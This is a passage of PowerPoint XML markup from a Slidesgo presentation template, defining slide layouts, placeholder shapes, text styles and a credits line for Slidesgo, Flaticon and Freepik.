        <p:spPr>
          <a:xfrm>
            <a:off x="11016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6" name="Google Shape;716;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36854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7" name="Google Shape;717;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38702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8" name="Google Shape;718;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6399513"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9" name="Google Shape;719;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6584250"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20" name="Shape 720"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="721" name="Google Shape;721;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="1187550"/>
            <a:ext cx="3435300" cy="2768400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="15000"/>
              <a:buNone/>
              <a:defRPr sz="1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30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5399635">
            <a:off x="134529" y="3482865"/>
            <a:ext cx="1454659" cy="1866612"/>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61926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rot="5437892">
            <a:off x="722909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56502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5437892">
            <a:off x="7377135" y="5522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txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="457638">
            <a:off x="4125941" y="1642138"/>
            <a:ext cx="3234417" cy="1263974"/>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2" name="Google Shape;732;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="458062">
            <a:off x="394080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3" name="Google Shape;733;p30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5399610">
            <a:off x="-61377" y="3588642"/>
            <a:ext cx="1615144" cy="1494563"/>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rot="-10799574">
            <a:off x="7876598" y="3364589"/>
            <a:ext cx="1245803" cy="1862056"/>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rot="-10799544">
            <a:off x="7739139" y="3665542"/>
            <a:ext cx="1383257" cy="1490916"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p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510891" y="44875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List">
  <p:cSld name="ONE_COLUMN_TEXT_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="742" name="Shape 742"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="743" name="Google Shape;743;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1937913" y="2406650"/>
            <a:ext cx="20682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44" name="Google Shape;744;p31"/>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31"/>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4404166" y="47996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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5634202" y="2406650"/>
            <a:ext cx="20685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54" name="Google Shape;754;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14413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55" name="Google Shape;755;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51376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MAIN_POINT_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="756"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32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5437877">
            <a:off x="4183373" y="641757"/>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5400000">
            <a:off x="6818008" y="1051782"/>
            <a:ext cx="756804"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rot="-5400000">
            <a:off x="6646477" y="1759846"/>
            <a:ext cx="339053" cy="1011106"/>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rot="-5400000">
            <a:off x="6377795" y="1492020"/>
            <a:ext cx="869696"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5400000">
            <a:off x="1569281" y="1051690"/>
            <a:ext cx="756804"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5400000">
            <a:off x="3942250" y="-1221986"/>
            <a:ext cx="1259527" cy="5349912"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="29009" w="7201">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="29009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7200" y="29009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72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5400000">
            <a:off x="2136087" y="1737287"/>
            <a:ext cx="352201" cy="1043074"/>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rot="-5400000">
            <a:off x="1896710" y="1492020"/>
            <a:ext cx="869696"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rot="5437877">
            <a:off x="4371060" y="609355"/>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771" name="Google Shape;771;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25075" y="-22500"/>
            <a:ext cx="1261394" cy="16184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25075" y="-22500"/>
            <a:ext cx="1497918" cy="1385924"/>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32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2288725" y="3668088"/>
            <a:ext cx="4566600" cy="5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accent5"/>
                </a:solidFill>
                <a:latin typeface="Alata"/>
                <a:ea typeface="Alata"/>
                <a:cs typeface="Alata"/>
                <a:sym typeface="Alata"/>
              </a:rPr>
              <a:t>CREDITS: This presentation template was created by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Alata"/>
                <a:ea typeface="Alata"/>
                <a:cs typeface="Alata"/>
                <a:sym typeface="Alata"/>
              </a:rPr>
              <a:t>Slidesgo,</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including icons from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Alata"/>
                <a:ea typeface="Alata"/>
                <a:cs typeface="Alata"/>
                <a:sym typeface="Alata"/>
              </a:rPr>
              <a:t>Flaticon,</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and infographics &amp; images by </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Alata"/>
                <a:ea typeface="Alata"/>
                <a:cs typeface="Alata"/>
                <a:sym typeface="Alata"/>
              </a:rPr>
              <a:t>Freepik.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Alata"/>
              <a:ea typeface="Alata"/>
              <a:cs typeface="Alata"/>
              <a:sym typeface="Alata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Alata"/>
              <a:ea typeface="Alata"/>
              <a:cs typeface="Alata"/>
              <a:sym typeface="Alata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="781" name="Google Shape;781;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2288688" y="2425351"/>
            <a:ext cx="4566600" cy="11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2" name="Google Shape;782;p32"/>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spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="783" name="Google Shape;783;p3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accent3"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="793" name="Shape 7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bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent6"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="794" name="Shape 79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bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="795" name="Shape 79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9" name="Shape 799"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="800" name="Google Shape;800;p3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1" name="Google Shape;801;p37"/>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802" name="Google Shape;802;p37"/>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803" name="Google Shape;803;p37"/>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804" name="Google Shape;804;p37"/>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6000"/>
              <a:buNone/>
              <a:defRPr sz="6000"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0B5394"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0B5394"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0B5394"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0B5394"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0B5394"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0B5394"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0B5394"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0B5394"/>
              </a:buClr>
              <a:buSzPts val="6000"/>
              <a:buNone/>
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805;p37"/>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400"/>
              <a:buNone/>
              <a:defRPr sz="14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6" name="Shape 806"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="807" name="Google Shape;807;p3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8" name="Google Shape;808;p38"/>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809" name="Google Shape;809;p38"/>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10" name="Google Shape;810;p38"/>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811" name="Google Shape;811;p38"/>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2" name="Shape 812"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="813" name="Google Shape;813;p3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4" name="Google Shape;814;p39"/>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815" name="Google Shape;815;p39"/>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16" name="Google Shape;816;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1398275" y="1249425"/>
            <a:ext cx="6963300" cy="2836500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-288925" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="950"/>
              <a:buChar char="●"/>
              <a:defRPr sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-288925" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="950"/>
              <a:buChar char="○"/>
              <a:defRPr sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-288925" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="950"/>
              <a:buChar char="■"/>
              <a:defRPr sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-288925" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="950"/>
              <a:buChar char="●"/>
              <a:defRPr sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-288925" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="950"/>
              <a:buChar char="○"/>
              <a:defRPr sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-288925" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="950"/>
              <a:buChar char="■"/>
              <a:defRPr sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-288925" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="950"/>
              <a:buChar char="●"/>
              <a:defRPr sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-288925" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="950"/>
              <a:buChar char="○"/>
              <a:defRPr sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-288925" lvl="8" marL="4114800" rtl="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7" name="Shape 817"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="818" name="Google Shape;818;p4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9" name="Google Shape;819;p40"/>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0" name="Google Shape;820;p40"/>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21" name="Google Shape;821;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74467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22" name="Google Shape;822;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480592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3" name="Shape 823"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="824" name="Google Shape;824;p4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5" name="Google Shape;825;p41"/>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6" name="Google Shape;826;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1002325" y="711175"/>
            <a:ext cx="20721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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="71312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ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474417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7" name="Shape 827"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="828" name="Google Shape;828;p4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9" name="Google Shape;829;p4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30" name="Google Shape;830;p42"/>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31" name="Google Shape;831;p42"/>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2" name="Shape 832"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="833" name="Google Shape;833;p43"/>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rotWithShape="0" algn="bl" dir="5400000" dist="57150">
              <a:srgbClr val="000000">
                <a:alpha val="39000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="834" name="Google Shape;834;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="877333">
            <a:off x="6289345" y="436639"/>
            <a:ext cx="2155721" cy="1510808"/>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0" sz="26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5" name="Shape 835"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="836" name="Google Shape;836;p4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37" name="Google Shape;837;p4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38" name="Google Shape;838;p44"/>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9" name="Google Shape;839;p44"/>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40" name="Google Shape;840;p44"/>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1" name="Shape 841"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="842" name="Google Shape;842;p4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3" name="Google Shape;843;p45"/>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44" name="Google Shape;844;p45"/>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5" name="Shape 845"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="846" name="Google Shape;846;p4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7" name="Google Shape;847;p46"/>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848" name="Google Shape;848;p46"/>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849" name="Google Shape;849;p46"/>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850" name="Google Shape;850;p46"/>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200"/>
              <a:buNone/>
              <a:defRPr b="0"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851" name="Google Shape;851;p46"/>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dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
